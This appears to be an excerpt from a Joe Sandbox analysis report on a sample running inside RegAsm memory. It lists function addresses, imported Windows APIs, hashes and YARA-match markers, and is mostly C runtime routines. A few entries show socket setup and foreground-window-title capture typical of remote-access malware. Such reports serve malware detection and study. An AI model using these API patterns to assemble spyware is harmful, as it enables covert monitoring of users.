Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20

Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9

Strings

, xrefs: 0044EE2E

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65

Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Strings

pQG, xrefs: 00409E2D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: pQG
API String ID: 176396367-3769108836
Opcode ID: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
Opcode Fuzzy Hash: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98

Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A

Strings

LCMapStringEx, xrefs: 10005F2A, 10005F34

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95

Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24

Strings

LCMapStringEx, xrefs: 00448BCE

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF

Strings

InitializeCriticalSectionEx, xrefs: 00448A9F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD

Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 10005D9B

Strings

FlsAlloc, xrefs: 10005D6D, 10005D77

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6

Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044874F

Strings

FlsAlloc, xrefs: 0044872B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE

Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 10003B06

Strings

FlsAlloc, xrefs: 10003AF5, 10003AFF

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6

Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00438DA9

Strings

FlsAlloc, xrefs: 00438DA2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE

Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA

Strings

@, xrefs: 0041B7C0

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90

Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99

Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74

Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4

Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E

_free.LIBCMT ref: 10006CD7
_free.LIBCMT ref: 10006D0D

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50

Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

_free.LIBCMT ref: 0044EFD0
_free.LIBCMT ref: 0044F006

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

dllmain_crt_process_attach.LIBCMT ref: 10001F22
dllmain_crt_process_detach.LIBCMT ref: 10001F35

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: dllmain_crt_process_attachdllmain_crt_process_detach
String ID:
API String ID: 3750050125-0
Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041BAB8
GetWindowTextW.USER32 ref: 0041BACB

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4

Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322

Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F

Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: __crt_fast_encode_pointer
String ID:
API String ID: 3768137683-0
Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1

Function 004118B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694

Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0043AA70

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
